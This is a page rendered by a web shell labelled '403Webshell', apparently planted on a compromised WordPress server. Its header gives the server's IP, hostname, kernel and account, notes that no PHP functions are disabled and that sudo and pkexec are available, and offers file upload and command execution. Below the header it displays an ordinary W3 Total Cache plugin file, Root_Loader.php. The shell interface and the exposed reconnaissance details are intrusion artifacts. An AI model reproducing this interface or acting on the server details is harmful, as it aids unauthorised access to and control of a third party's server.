403Webshell
Server IP : 208.122.213.31  /  Your IP : 216.73.216.45
Web Server : Apache
System : Linux msd6191.mjhst.com 4.18.0-553.137.1.el8_10.x86_64 #1 SMP Wed Jun 24 11:40:24 UTC 2026 x86_64
User : WHMCS_MIA_382 ( 1001)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/httpd/html/baberankings.com/wp-content/plugins/w3-total-cache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/httpd/html/baberankings.com/wp-content/plugins/w3-total-cache/Root_Loader.php
<?php
/**
 * File: Root_Loader.php
 *
 * @package W3TC
 */

namespace W3TC;

defined( 'ABSPATH' ) || exit;
/**
 * Class: Root_Loader
 *
 * phpcs:disable PSR2.Classes.PropertyDeclaration.Underscore
 */
class Root_Loader {
	/**
	 * Enabled Plugins that has been run
	 *
	 * @var W3_Plugin[]
	 */
	private $_loaded_plugins = array();

	/**
	 * Enabled extensions that has been run
	 *
	 * @var W3_Plugin[]
	 */
	private $_loaded_extensions = array();

	/**
	 * Constructor for the Root_Loader class.
	 *
	 * Initializes and loads the required plugins based on the current configuration.
	 *
	 * @return void
	 */
	public function __construct() {
		$w3tc_c = Dispatcher::config();

		$plugins   = array();
		$plugins[] = new Generic_Plugin();

		if ( $w3tc_c->get_boolean( 'dbcache.enabled' ) ) {
			$plugins[] = new DbCache_Plugin();
		}

		if ( $w3tc_c->getf_boolean( 'objectcache.enabled' ) ) {
			$plugins[] = new ObjectCache_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'pgcache.enabled' ) ) {
			$plugins[] = new PgCache_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'cdn.enabled' ) ) {
			$plugins[] = new Cdn_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'cdnfsd.enabled' ) ) {
			$plugins[] = new Cdnfsd_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'lazyload.enabled' ) ) {
			$plugins[] = new UserExperience_LazyLoad_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'browsercache.enabled' ) ) {
			$plugins[] = new BrowserCache_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'minify.enabled' ) ) {
			$plugins[] = new Minify_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'varnish.enabled' ) ) {
			$plugins[] = new Varnish_Plugin();
		}

		if ( $w3tc_c->get_boolean( 'stats.enabled' ) ) {
			$plugins[] = new UsageStatistics_Plugin();
		}

		if ( is_admin() ) {
			$plugins[] = new Generic_Plugin_Admin();
			$plugins[] = new Generic_Plugin_AdminNotices();
			$plugins[] = new Generic_Plugin_Survey();
			$plugins[] = new BrowserCache_Plugin_Admin();
			$plugins[] = new DbCache_Plugin_Admin();
			$plugins[] = new UserExperience_Plugin_Admin();
			$plugins[] = new ObjectCache_Plugin_Admin();
			$plugins[] = new PgCache_Plugin_Admin();
			$plugins[] = new Minify_Plugin_Admin();
			$plugins[] = new Generic_WidgetSpreadTheWord_Plugin();
			$plugins[] = new Generic_Plugin_WidgetForum();
			$plugins[] = new Generic_Plugin_WidgetNews();
			$plugins[] = new SystemOpCache_Plugin_Admin();

			$plugins[] = new Cdn_Plugin_Admin();
			$plugins[] = new Cdnfsd_Plugin_Admin();

			$w3tc_cdn_engine = $w3tc_c->get_string( 'cdn.engine' );

			$plugins[] = new PageSpeed_Api();
			$plugins[] = new PageSpeed_Page();
			$plugins[] = new PageSpeed_Widget();

			$plugins[] = new Generic_Plugin_AdminCompatibility();
			$plugins[] = new Licensing_Plugin_Admin();

			if ( $w3tc_c->get_boolean( 'pgcache.enabled' ) || $w3tc_c->get_boolean( 'varnish.enabled' ) ) {
				$plugins[] = new Generic_Plugin_AdminRowActions();
			}

			$plugins[] = new Extensions_Plugin_Admin();
			$plugins[] = new UsageStatistics_Plugin_Admin();
			$plugins[] = new SetupGuide_Plugin_Admin();
			$plugins[] = new FeatureShowcase_Plugin_Admin();
		} elseif ( $w3tc_c->get_boolean( 'jquerymigrate.disabled' ) ) {
			$plugins[] = new UserExperience_Plugin_Jquery();
		}

		$this->_loaded_plugins = $plugins;

		register_activation_hook(
			W3TC_FILE,
			array( $this, 'activate' )
		);

		register_deactivation_hook(
			W3TC_FILE,
			array( $this, 'deactivate' )
		);
	}

	/**
	 * Runs all loaded plugins and initializes extensions.
	 *
	 * Executes the `on_w3tc_plugins_loaded` method if it exists in `$GLOBALS['wpdb']`.
	 *
	 * @return void
	 */
	public function run() {
		foreach ( $this->_loaded_plugins as $plugin ) {
			$plugin->run();
		}

		if ( method_exists( $GLOBALS['wpdb'], 'on_w3tc_plugins_loaded' ) ) {
			$w3tc_o = $GLOBALS['wpdb'];
			$w3tc_o->on_w3tc_plugins_loaded();
		}

		$this->run_extensions();
	}

	/**
	 * Activates the plugin, performing necessary setup actions.
	 *
	 * @param bool $network_wide Whether the activation is for a network-wide installation.
	 *
	 * @return void
	 */
	public function activate( $network_wide ) {
		Root_AdminActivation::activate( $network_wide );
	}

	/**
	 * Deactivates the plugin, performing necessary cleanup actions.
	 *
	 * @return void
	 */
	public function deactivate() {
		Root_AdminActivation::deactivate();
	}

	/**
	 * Loads and runs the active extensions for both frontend and admin environments.
	 *
	 * Includes extension files and triggers extension-related actions.
	 *
	 * @return void
	 */
	public function run_extensions() {
		$w3tc_c     = Dispatcher::config();
		$extensions = $w3tc_c->get_array( 'extensions.active' );

		/**
		 * Layer 1 of the file-inclusion playbook: drop raw-config-path
		 * concatenation in favour of a slug -> known-path allowlist
		 * resolved by Util_Extension::resolve(). The legacy config shape
		 * (`slug => relative-path`) is normalized read-side via
		 * convert_legacy_entries(); entries whose key is not in the
		 * hard-coded allowlist -- or whose path value doesn't match the
		 * canonical path for that slug -- are silently dropped, not
		 * included.
		 *
		 * @since 2.10.0
		 */
		$extensions = Util_Extension::convert_legacy_entries( $extensions );

		$frontend = Util_Extension::convert_legacy_entries( $w3tc_c->get_array( 'extensions.active_frontend' ) );
		foreach ( $frontend as $w3tc_extension => $nothing ) {
			if ( isset( $extensions[ $w3tc_extension ] ) ) {
				Util_Extension::include_once( $w3tc_extension );
			}
		}

		if ( is_admin() ) {
			foreach ( $extensions as $w3tc_extension => $nothing ) {
				Util_Extension::include_once( $w3tc_extension );
			}
		}

		w3tc_do_action( 'wp_loaded' );
		do_action( 'w3tc_extension_load' );
		if ( is_admin() ) {
			do_action( 'w3tc_extension_load_admin' );
		}

		// Hide Image Service converted images.
		$w3tc_settings = $w3tc_c->get_array( 'imageservice' );
		$visibility    = isset( $w3tc_settings['visibility'] ) ? $w3tc_settings['visibility'] : 'never';

		if ( 'never' === $visibility || ( 'extension' === $visibility && ! isset( $extensions['imageservice'] ) ) ) {
			add_action(
				'pre_get_posts',
				array( $this, 'w3tc_modify_query_obj' )
			);

			add_filter(
				'ajax_query_attachments_args',
				array( $this, 'w3tc_filter_ajax_args' )
			);
		}
	}

	/**
	 * Modifies the main query to exclude Image Service converted images from the media library.
	 *
	 * @param \WP_Query $query The main query object.
	 *
	 * @return void
	 */
	public function w3tc_modify_query_obj( $query ) {
		if ( ! is_admin() || ! $query->is_main_query() ) {
			return;
		}

		if ( function_exists( 'get_current_screen' ) ) {
			$w3tc_screen = get_current_screen();
		} else {
			return;
		}

		if ( ! $w3tc_screen || 'upload' !== $w3tc_screen->id || 'attachment' !== $w3tc_screen->post_type ) {
			return;
		}

		// Get the existing meta query array, add ours, and then save it.
		$meta_query   = (array) $query->get( 'meta_query' );
		$meta_query[] = array(
			'key'     => 'w3tc_imageservice_file',
			'compare' => 'NOT EXISTS',
		);

		$query->set( 'meta_query', $meta_query );
	}

	/**
	 * Filters AJAX attachment query arguments to exclude Image Service converted images.
	 *
	 * @param array $args The query arguments for AJAX attachments.
	 *
	 * @return array Modified query arguments.
	 */
	public function w3tc_filter_ajax_args( $args ) {
		if ( ! is_admin() ) {
			return;
		}

		$args['meta_query'] = array( // phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_query
			array(
				'key'     => 'w3tc_imageservice_file',
				'compare' => 'NOT EXISTS',
			),
		);

		return $args;
	}
}

global $w3tc_root;
if ( is_null( $w3tc_root ) ) {
	$w3tc_root = new \W3TC\Root_Loader();
	$w3tc_root->run();
}

Youez - 2016 - github.com/yon3zu
LinuXploit